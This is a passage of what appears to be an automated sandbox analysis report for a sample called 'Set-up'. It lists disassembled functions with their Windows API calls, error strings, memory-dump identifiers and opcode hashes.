                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: P\$RefPtrConst<class VersionInfo>::GetRef$m_ptr != nullptr
                                                                                                                                  • API String ID: 0-1279626962
                                                                                                                                  • Opcode ID: 6661c075ee7ae81078ca22b7f8ac3474c91358ce08e5feaa13ac70f94af379af
                                                                                                                                  • Instruction ID: 85eaf372827bc4c30b34f86d3a503e673036ed436ef468d7ea2454656924c2ae
                                                                                                                                  • Opcode Fuzzy Hash: 6661c075ee7ae81078ca22b7f8ac3474c91358ce08e5feaa13ac70f94af379af
                                                                                                                                  • Instruction Fuzzy Hash: 1E1106B1605700AFD729EF64C805B9AB3F8FB40714F00466EE46EA3A81DF75B900CB50
                                                                                                                                  Function 00E5E020 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetProcAddress.KERNEL32(?,?), ref: 00E5E061
                                                                                                                                  • GetLastError.KERNEL32 ref: 00E5E06E
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E5E0F1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressErrorException@8LastProcThrow
                                                                                                                                  • String ID: GetProcAddress(
                                                                                                                                  • API String ID: 3662558089-3397178597
                                                                                                                                  • Opcode ID: c05a206fb06773df12ab07767dedd2720d8219698f81e7dca6af3a3ae0db8e41
                                                                                                                                  • Instruction ID: b310d66083cf04ca4902563a05743d86fe3f9aafdba5b14613dcbda48e4fdedf
                                                                                                                                  • Opcode Fuzzy Hash: c05a206fb06773df12ab07767dedd2720d8219698f81e7dca6af3a3ae0db8e41
                                                                                                                                  • Instruction Fuzzy Hash: F521B071900244EBCB29DF64DD41B9BBBF9EF14708F10886AF855A7291E771EA08CB51
                                                                                                                                  Function 00E66130 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 73COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00E6619E
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00E661A5
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Concurrency::cancel_current_task
                                                                                                                                  • String ID: c_ >= s_$datavect<unsigned char>::append
                                                                                                                                  • API String ID: 118556049-4044520967
                                                                                                                                  • Opcode ID: 369e5e1b5f2ec3215822857f6a3f3fc8bb4a5a535cf15dc9cc078304d8e11972
                                                                                                                                  • Instruction ID: 157aadf0cc7f3306ffd92f0054b8ade94d9bd306e1b6dce4e07cf15260fbfc23
                                                                                                                                  • Opcode Fuzzy Hash: 369e5e1b5f2ec3215822857f6a3f3fc8bb4a5a535cf15dc9cc078304d8e11972
                                                                                                                                  • Instruction Fuzzy Hash: E7117A3235021017C724AA69EC1199FBBDDDF927E4B14893AFD58E7A81EA62ED008391
                                                                                                                                  Function 00E82AE0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateEventW.KERNEL32(460C02D8,00000000,00000000,00000001), ref: 00E82AF5
                                                                                                                                  • GetLastError.KERNEL32(00000001), ref: 00E82B05
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E82B30
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateErrorEventException@8LastThrow
                                                                                                                                  • String ID: CreateEvent()
                                                                                                                                  • API String ID: 381832486-3772053499
                                                                                                                                  • Opcode ID: f38a59806254bd4d6d138713cf110696db5e269bef656a2f1932aa4e329614b0
                                                                                                                                  • Instruction ID: a8b861a04d8c3fa70c0e2ab838f6fa44b4a37e1fe31699ae30561c592f31bcae
                                                                                                                                  • Opcode Fuzzy Hash: f38a59806254bd4d6d138713cf110696db5e269bef656a2f1932aa4e329614b0
                                                                                                                                  • Instruction Fuzzy Hash: 08117271A0020DAFCF14EFA4DD45D9EBBB9FF08310F008569F91997290DB31AA14DB91
                                                                                                                                  Function 00E6BA00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00E6BA4A
                                                                                                                                  • GetLastError.KERNEL32 ref: 00E6BA55
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E6BAB1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorException@8FileLastPointerThrow
                                                                                                                                  • String ID: SetFilePointer()
                                                                                                                                  • API String ID: 1827965452-1438284906
                                                                                                                                  • Opcode ID: 6c21a8bfe399d3393da18d30af7ab8e893a2065eaea98c0a41a2e72228498749
                                                                                                                                  • Instruction ID: 3a98515a252295b53781455df6aa398abc09ab5ea9c4e4648d68b2876e1070c1
                                                                                                                                  • Opcode Fuzzy Hash: 6c21a8bfe399d3393da18d30af7ab8e893a2065eaea98c0a41a2e72228498749
                                                                                                                                  • Instruction Fuzzy Hash: 4011A2342042069FC718DF24E855AAABBE5BF44360F004629F871933D1DB70A945CB95
                                                                                                                                  Function 00E69F50 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ReadConsoleInputW.KERNEL32(?,00000001,?,?,460C02D8), ref: 00E69FD2
                                                                                                                                  • GetLastError.KERNEL32 ref: 00E69FDC
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E6A020
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ConsoleErrorExceptionException@8InputLastRaiseReadThrow
                                                                                                                                  • String ID: ReadConsoleInputW()
                                                                                                                                  • API String ID: 379417519-401847460
                                                                                                                                  • Opcode ID: 151ea48801a56481fd02ae232644226cf8b2441d31c08912429dd48893415d1f
                                                                                                                                  • Instruction ID: dc1cf7ed27f8a1ed6c83fa4df022cc51c3b30c5982742447b01f9b1eb6fd7149
                                                                                                                                  • Opcode Fuzzy Hash: 151ea48801a56481fd02ae232644226cf8b2441d31c08912429dd48893415d1f
                                                                                                                                  • Instruction Fuzzy Hash: 2A21AE70900209EFDB24DF55D958BAAFBF9FB44710F00826AE825A7384DB75AA04CB90
                                                                                                                                  Function 00E652C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetConsoleCursorPosition.KERNEL32(00E5F583,?,460C02D8,?,?), ref: 00E6533B
                                                                                                                                  • GetLastError.KERNEL32(?,?), ref: 00E65345
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E65389
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  Strings
                                                                                                                                  • SetConsoleCursorPosition(), xrefs: 00E65363
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ConsoleCursorErrorExceptionException@8LastPositionRaiseThrow
                                                                                                                                  • String ID: SetConsoleCursorPosition()
                                                                                                                                  • API String ID: 3674480829-1064639240
                                                                                                                                  • Opcode ID: e287a9143117faaaec15cf28640ed76f86b2a9cce44709356b2c8454b6e10053
                                                                                                                                  • Instruction ID: cbc368d581a4684e1b48786d0a215bbb5d92fd3e5ace268e5c6b9ff9bda98129
                                                                                                                                  • Opcode Fuzzy Hash: e287a9143117faaaec15cf28640ed76f86b2a9cce44709356b2c8454b6e10053
                                                                                                                                  • Instruction Fuzzy Hash: 6C21CF70A00209EFCB18DF65D944B9EFBF8FF04724F00866AE815A7394DB75AA04CB90
                                                                                                                                  Function 00E651C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetConsoleCursorInfo.KERNEL32(?,?,460C02D8), ref: 00E65239
                                                                                                                                  • GetLastError.KERNEL32 ref: 00E65243
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E65287
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ConsoleCursorErrorExceptionException@8InfoLastRaiseThrow
                                                                                                                                  • String ID: SetConsoleCursorInfo()
                                                                                                                                  • API String ID: 2095948160-3360732971
                                                                                                                                  • Opcode ID: efc566b2ead487e041122fde1196944c76c34aa05591e8184534e5f68deb6f2e
                                                                                                                                  • Instruction ID: 003119fcc41e56959c721e54698fb27169c530abd40b2438bebccb592f977857
                                                                                                                                  • Opcode Fuzzy Hash: efc566b2ead487e041122fde1196944c76c34aa05591e8184534e5f68deb6f2e
                                                                                                                                  • Instruction Fuzzy Hash: A521A170510209EFCB14DF65D954B9EFBF8FF04724F108669E815A7394DB756A04CB90
                                                                                                                                  Function 00E653C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetConsoleTextAttribute.KERNEL32(00E5F0E1,?,460C02D8,00000000,00E62C18), ref: 00E65439
                                                                                                                                  • GetLastError.KERNEL32 ref: 00E65443
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E65487
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  Strings
                                                                                                                                  • SetConsoleTextAttribute(), xrefs: 00E65461
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AttributeConsoleErrorExceptionException@8LastRaiseTextThrow
                                                                                                                                  • String ID: SetConsoleTextAttribute()
                                                                                                                                  • API String ID: 3711401018-872377736
                                                                                                                                  • Opcode ID: d48b99087334531aa6d7d10dba889e9f55e2a7261dfcbb6802452317194a69df
                                                                                                                                  • Instruction ID: cc13f6eb9de5e94a1fe0972ccd3a9823f1269f8e6d71ccdb3639f530e6e72227
                                                                                                                                  • Opcode Fuzzy Hash: d48b99087334531aa6d7d10dba889e9f55e2a7261dfcbb6802452317194a69df
                                                                                                                                  • Instruction Fuzzy Hash: B821B070A10209EFCB14DF65D954B9EFBF8FF04724F00866AE825A7394DB75AA04CB90
                                                                                                                                  Function 00E654C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetConsoleCursorInfo.KERNEL32(?,?,460C02D8,?,?), ref: 00E65539
                                                                                                                                  • GetLastError.KERNEL32(?,?), ref: 00E65543
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E65587
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
